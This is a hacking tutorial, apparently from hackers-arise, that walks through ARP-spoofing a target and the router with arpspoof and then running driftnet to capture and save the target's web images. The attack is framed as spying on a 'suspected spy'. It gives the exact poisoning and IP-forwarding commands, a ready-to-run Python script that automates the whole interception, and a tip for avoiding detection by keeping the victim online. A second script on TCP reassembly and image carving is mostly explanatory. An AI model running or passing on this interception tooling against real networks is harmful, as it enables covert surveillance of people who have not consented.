
MitM: Using driftnet to View the Target's Graphics Files

Using MiTM with driftnet to View the Target's Images
In each of our previous MiTM attacks, we placed ourselves between two hosts and viewed their traffic. That traffic can be seen with Wireshark or other packet sniffers. As we can see below, Wireshark shows each packet going over the wire in great detail, and we can capture those packets for later analysis.
When we apply the Wireshark display filter "http", we see only the HTTP traffic, and we know that some of these packets carry images. The problem is that we can't view or reconstruct them from the packet list: an image is usually fragmented across many TCP segments, so a sniffer tells us that jpg, png, gif and other graphic files are passing over the wire or the air, but not what the pictures are. (Wireshark can pull complete objects out of a saved capture via File > Export Objects > HTTP, but that is after the fact, not live.)
Our Scenario
Let's assume that our task is to check whether someone we suspect of spying for a foreign government is sending or receiving secret images from their computer. These images might include maps, plans, intellectual property, pictures of other spies, etc. They may hold top secret information that we need to view to protect our nation. How can we do it?
First, we need to place ourselves between the target and their router, so that all of their traffic passes through us. Then we use a tool called "driftnet" that is designed to identify, capture and reconstruct images from passing traffic; it stores them on our computer and displays them on our screen. One caveat up front: driftnet can only reconstruct images carried in the clear (plain HTTP). Anything inside a TLS connection is opaque to it, so a target who only visits HTTPS sites will show us nothing.
Step #1: Use arpspoof to place ourselves in the middle
We have used both arpspoof and Ettercap to place ourselves in the middle in the classic MiTM attack. You can use either for this purpose, but in this lesson I will be using arpspoof. Although Ettercap may be easier to use due to its intuitive GUI, I find that arpspoof is more reliable.
To set up the arpspoof, remember that we need three terminals (two for arpspoof, one for driftnet). In the first one type:
kali > arpspoof -i eth0 -t 192.168.1.1 192.168.1.115
Where:
                -i eth0 is the interface we want to sniff and arpspoof on
                -t 192.168.1.1 is the target whose ARP cache we poison, here the router
                192.168.1.115 is the host we claim to be, the suspected spy's IP
With this running, the router believes our MAC address belongs to 192.168.1.115 and sends everything destined for the spy to us.
It's worth noting here that if we were doing this MiTM on a wireless network, we could simply replace "-i eth0" with "-i wlan0".
Then, in the second terminal, poison the other end of the connection by swapping the two IP addresses. The -t flag is still required; without it arpspoof broadcasts its forged replies and poisons every host on the LAN. (Kali's build of arpspoof also accepts -r, which poisons both hosts from one process, so the first command with -r added would replace both.)
kali > arpspoof -i eth0 -t 192.168.1.115 192.168.1.1
Finally, we need to enable IP forwarding so that the traffic we intercept is relayed to its real destination instead of being dropped. This needs root, and in practice you should turn it on before starting arpspoof: while forwarding is off and the poisoning is in place, the spy simply loses connectivity, which tends to get noticed.
kali > echo 1 > /proc/sys/net/ipv4/ip_forward
Now we have placed ourselves successfully between our suspected spy and the router. All of his traffic to and from the Internet passes through our computer, and that opens up a lot of interesting possibilities for us!
Step #2: Set up driftnet
Now that we sit between the spy and his router, we should be able to see every image he sends or receives over the Internet. Our next step is to start driftnet. We do this simply by typing driftnet in the third terminal (don't use the terminals where arpspoof is running, as that would terminate the arpspoof). If the default capture device is not the interface you are spoofing on, name it explicitly with -i eth0.
kali > driftnet
Notice that when we do this, a small window opens up below our terminal. In my case it opened at the lower left, but it may open on any free screen real estate. Maximize this window, as this is where driftnet displays the images it finds and reconstructs.
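Putting Steps 1 and 2 together: the script below is an added example, not from the original article and not the tools' own code. It runs the same arpspoof and driftnet commands from Python in an order that avoids the two common mistakes (poisoning before forwarding is on, and killing arpspoof without letting it restore the ARP caches) and puts ip_forward back on Ctrl-C. It assumes Kali's arpspoof (dsniff) and driftnet binaries and must run as root; the interface name, addresses and output directory are placeholders you supply on the command line.

```python
#!/usr/bin/env python3
"""Start arpspoof (both directions) and driftnet in the right order, undo on Ctrl-C.
Added example for this article, not arpspoof's or driftnet's code. Assumes Kali's
arpspoof and driftnet binaries are on PATH and that we run as root."""
import ipaddress
import os
import signal
import subprocess
import sys
import time

IP_FORWARD = "/proc/sys/net/ipv4/ip_forward"


def build_commands(iface, gateway, target, outdir):
    """Return the argv lists to run, in order. 'arpspoof -t X Y' tells host X that
    we own Y's address, so each direction needs its own process."""
    gw = str(ipaddress.IPv4Address(gateway))   # rejects junk such as "192.168.1"
    tg = str(ipaddress.IPv4Address(target))
    if gw == tg:
        raise ValueError("gateway and target must be different hosts")
    return [
        ["arpspoof", "-i", iface, "-t", gw, tg],   # router now sends the target's traffic to us
        ["arpspoof", "-i", iface, "-t", tg, gw],   # target now sends its traffic to us
        ["driftnet", "-i", iface, "-d", outdir],   # reconstruct images into a directory we chose
    ]


def read_ip_forward():
    with open(IP_FORWARD) as f:
        return f.read().strip()


def write_ip_forward(value):
    with open(IP_FORWARD, "w") as f:
        f.write(value)


def run(iface, gateway, target, outdir):
    os.makedirs(outdir, exist_ok=True)
    previous = read_ip_forward()
    write_ip_forward("1")            # forwarding on BEFORE poisoning, or the target goes offline
    procs = []
    try:
        for argv in build_commands(iface, gateway, target, outdir):
            procs.append(subprocess.Popen(argv))
            time.sleep(1)            # give each process a moment to come up
        signal.pause()               # wait for Ctrl-C
    except KeyboardInterrupt:
        pass
    finally:
        # driftnet first, arpspoof last: on SIGINT arpspoof re-ARPs both hosts with
        # their real MAC addresses, so never SIGKILL it.
        for p in reversed(procs):
            if p.poll() is None:
                p.send_signal(signal.SIGINT)
            p.wait()
        write_ip_forward(previous)
        print("ip_forward restored to", previous, "- images saved under", outdir)


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: mitm_driftnet.py IFACE GATEWAY_IP TARGET_IP OUTDIR")
    run(*sys.argv[1:])
```

Saved as, say, mitm_driftnet.py, it is run as `python3 mitm_driftnet.py eth0 192.168.1.1 192.168.1.115 /tmp/spy-images`. The -d option hands driftnet a directory of your choosing, so the saved files are not hidden under a random /tmp name (see Step 4).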
Step #3: View the Images in Real Time
Now, whenever our spy sends or receives any Internet traffic, it will traverse our system and we can filter, reconstruct, view and save the images.
Now, we simply wait for our suspected spy to go to the Internet.
Suddenly, pictures begin to appear on our screen in the driftnet window!
Looks like our spy is a sports fan! He navigated to www.espn.com and driftnet captured and displayed the pictures. That doesn't mean he isn't up to something nefarious, so we keep driftnet open to capture more images as he continues to surf the Internet or send files.
Step #4: Find the Stored Images
Although these first images appear to be innocuous, we may still want to save them for further analysis. In addition, if we leave our MiTM in place and driftnet running, it will continue to capture images.
If we go back to the driftnet command terminal, we will see that driftnet tells us where it is saving the images.
Note that driftnet saves the images under /tmp in a subdirectory with a random suffix. Interestingly, the subdirectory name is misspelled (drifnet rather than driftnet), which can be confusing: when looking for the images, you must use the misspelling as well. If you would rather know the location in advance, start driftnet with -d <directory> and it saves into that directory instead.
Let's navigate to that directory and see what driftnet has captured and saved for us.
kali > cd /tmp/drifnet-1Ilw8b
As you can see, in just a few short seconds, driftnet has captured, reconstructed and saved numerous images. These are all jpeg and gif files, but driftnet can handle other formats as well: newer builds also reconstruct PNG, and with the -s option it extracts MPEG audio streams from the traffic and can hand them to a player.
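To make concrete why the packet-by-packet view described at the start of this article can't show the picture, and what driftnet does with the jpeg and gif data it finds, here is an added example (not driftnet's code and not from the original article) of the two steps in miniature: reassemble one direction of a TCP flow from out-of-order and retransmitted segments, then carve complete images out of the byte stream by their start and end markers. The traffic is constructed in-line: a real 1x1 GIF and a "JPEG" that consists only of its SOI/JFIF/EOI markers, so the second image is not decodable and just exercises the scan.

```python
"""Reassemble a TCP byte stream and carve images out of it, driftnet-style.
Added example for this article, not driftnet's code. All traffic below is
constructed here; the JPEG is a marker skeleton, not a real picture."""
import random

# start / end byte markers for the formats driftnet handles (PNG in newer builds)
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff", b"\xff\xd9"),               # SOI ... EOI
    "gif":  (b"GIF8", b"\x00\x3b"),                       # GIF87a/89a ... trailer
    "png":  (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),    # signature ... IEND chunk
}


def reassemble(segments):
    """segments: iterable of (tcp_seq, payload) for one direction of a flow,
    possibly out of order or retransmitted. Returns the contiguous bytes from
    the lowest sequence number and stops at the first hole, which is all a
    passive sniffer can do until the missing segment is retransmitted."""
    ordered = sorted(segments, key=lambda s: s[0])
    if not ordered:
        return b""
    base = ordered[0][0]
    out = bytearray()
    for seq, payload in ordered:
        offset = seq - base
        if offset > len(out):          # hole in the stream: wait for more data
            break
        already = len(out) - offset    # bytes of this segment we already have
        if already < len(payload):     # pure retransmit -> skip; else keep the new tail
            out += payload[already:]
    return bytes(out)


def carve(stream):
    """Return [(format, image_bytes)] for every complete image in the stream.
    Marker scan like driftnet's, not a full decode: an EOI marker inside an
    EXIF thumbnail, for example, would cut a JPEG short."""
    images, i = [], 0
    while True:
        hits = [(stream.find(start, i), fmt) for fmt, (start, _) in SIGNATURES.items()]
        hits = [h for h in hits if h[0] != -1]
        if not hits:
            break
        pos, fmt = min(hits)                      # earliest image start after i
        start, end = SIGNATURES[fmt]
        endpos = stream.find(end, pos + len(start))
        if endpos == -1:                          # truncated: image still in flight
            break
        endpos += len(end)
        images.append((fmt, stream[pos:endpos]))
        i = endpos
    return images


# --- constructed sample traffic: two HTTP responses on one keep-alive connection ---
GIF_1X1 = bytes.fromhex(
    "474946383961" "01000100800000" "000000ffffff"
    "21f9040100000000" "2c000000000100010000" "0202440100" "3b")
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 24 + b"\xff\xd9"  # markers only
SERVER_STREAM = (b"HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\n\r\n" + GIF_1X1 +
                 b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n" + FAKE_JPEG)


def segment(stream, mss=20, seq0=1000):
    """Cut a byte stream into (seq, payload) TCP segments of at most mss bytes."""
    return [(seq0 + off, stream[off:off + mss]) for off in range(0, len(stream), mss)]


SAMPLE_SEGMENTS = segment(SERVER_STREAM)
random.Random(7).shuffle(SAMPLE_SEGMENTS)    # segments arrive out of order ...
SAMPLE_SEGMENTS.append(SAMPLE_SEGMENTS[0])   # ... and one of them is retransmitted


def carve_sample():
    """What driftnet would recover from the constructed flow above."""
    return carve(reassemble(SAMPLE_SEGMENTS))


if __name__ == "__main__":
    for fmt, data in carve_sample():
        print(fmt, len(data), "bytes")
```

Note that no single 20-byte segment holds either image, which is exactly why the Wireshark packet list shows image traffic without showing the image; only after reassembly does the marker scan find anything. Truncated images are deliberately not emitted, since driftnet has the same rule: no end marker, no picture.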


Source: hackers-arise; full article here.
